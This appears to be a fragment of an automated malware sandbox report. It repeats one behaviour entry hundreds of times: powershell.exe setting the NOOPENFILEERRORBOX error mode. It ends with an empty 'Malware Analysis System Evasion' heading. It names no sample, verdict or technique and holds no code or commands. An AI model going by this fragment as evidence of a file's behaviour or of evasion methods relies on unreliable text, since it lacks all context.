Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

